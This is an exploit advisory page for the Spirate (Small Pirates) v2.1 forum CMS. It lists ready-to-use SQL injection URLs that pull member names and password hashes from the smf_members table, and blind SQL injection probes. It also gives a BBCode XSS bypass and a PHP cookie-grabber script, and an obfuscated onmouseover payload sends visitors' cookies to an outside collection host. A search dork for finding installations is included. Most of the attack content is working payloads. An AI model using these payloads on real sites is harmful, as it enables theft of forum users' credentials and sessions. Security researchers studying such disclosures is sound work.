MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1-->

2010.07.22
Credit: y3nh4ck3r
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

---------------------------------------------------------- MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1--> ---------------------------------------------------------- CMS INFORMATION: -->WEB: http://spirate.net/foro/ -->DOWNLOAD: http://spirate.net/foro/ -->DEMO: http://www.santiagoescraches.com.ar/index.php -->CATEGORY: CMS / Board CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "Basado en Spirate" -->CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION -->AFFECT VERSION: <= 2.1 -->Discovered Bug date: 2009-05-10 -->Reported Bug date: 2009-05-10 -->Fixed bug date: N/A -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>> ------- INTRO: ------- This system is a mixed combinations. Info by admin (quote): "cw*= SMF+Paquetes" "Spirate=cw+a&#241;adidos+reparaciones+correcciones" "*cw = casitaweb." ------------------- PROOFS OF CONCEPT: ------------------- [++] GET var --> 'id' [++] File vuln --> 'pag1.php' ~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/* [++] GET var --> 'id' [++] File vuln --> 'pag1-guest.php' ~~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(user(), 0x3A3A3A,database()),5,6/* [++] GET var --> 'id' [++] File vuln --> 'rss-coment_post.php' [++] Note --> More info in source code ~~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,con cat(user(),0x3A3A,database()),4,5,6,version(),8/* [++] GET var --> 'id' [++] File vuln --> 'rss-pic-comment.php' [++] Note --> More info in source code ~~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4 ,current_user(),6,user(),8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81/* [++[Return]++] ~~~~~> user, version and database. ---------- EXPLOITS: ---------- ~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x 3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1/* ~~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberN ame,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1/* ~~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,con cat(memberName,0x3A3A3A,passwd),4,5,6,concat(memberName,0x3A3A3A,passwd) ,8+FROM+smf_members+WHERE+ID_MEMBER=1/* ~~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4 ,concat(memberName,0x3A3A3A,passwd),6,concat(memberName,0x3A3A3A,passwd) ,8,9,concat(memberName,0x3A3A3A,passwd),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,concat(memberName,0x3A3A3A,passwd),31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58, 59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FRO M+smf_members+WHERE+ID_MEMBER=1/* [++[Return]++] ~~~~~> memberName:::passwd in 'members' table ###################################### ////////////////////////////////////// COOKIE STEALING VULN (BYPASS BBCODE): ////////////////////////////////////// ###################################### <<<<---------++++++++++++++ Condition: Post a comment +++++++++++++++++--------->>>> ------- INTRO: ------- This system is a mixed combinations. Info by admin (quote): "cw*= SMF+Paquetes" "Spirate=cw+a&#241;adidos+reparaciones+correcciones" "*cw = casitaweb." ------------------- PROOF OF CONCEPT: ------------------- [url][img]http://www.google.es onmouseover=while(true){alert(1);} [/img][/url] [++[Return]++] ~~~~~> recursive alert message saying "1" ---------- EXPLOIT: ---------- Cookie Grabber Script --> capturethecookies.php Example Script (Before Creat exploited.txt): <?php $ck=$_GET["ck"]; //Capture the cookies $manejador=fopen("exploited.txt",'a'); fwrite($manejador, "Cookie:\r\n".htmlentities($ck)."\r\n--EOF--\r\n"); //Save the values fclose($manejador); echo "<script>location.href='http://[HOST]/index.php';</script>"; //Redirect... ?> Example Hosting --> http://www.myphpcookiestealing.es/capturethecookies.php?ck= Poisoning's comment: [url][img]http://www.owned.owned onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47, 47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101 ,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101, 99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110, 116,46,99,111,111,107,105,101,61)+document.cookie [/img][/url] [++[Return]++] ~~~~~> Cookie and PHPSESSID in exploited.txt ########################### /////////////////////////// BLIND SQL INJECTION (SQLi): /////////////////////////// ########################### <<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>> ------- INTRO: ------- This system is a mixed combinations. Info by admin (quote): "cw*= SMF+Paquetes" "Spirate=cw+a&#241;adidos+reparaciones+correcciones" "*cw = casitaweb." ------------------- PROOFS OF CONCEPT: ------------------- [++] GET var --> 'id' [++] File vuln --> 'index.php' ~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 --> TRUE ~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 --> FALSE ---------- EXPLOITS: ---------- ~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@ version,1,1)=5 --> TRUE ~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@ version,1,1)=4 --> FALSE ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################

Referencje:

http://xforce.iss.net/xforce/xfdb/50837
http://www.securityfocus.com/archive/1/archive/1/503863/100/0/threaded
http://secunia.com/advisories/35272
http://osvdb.org/54788
http://osvdb.org/54787
http://osvdb.org/54786
http://osvdb.org/54785
http://osvdb.org/54784


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top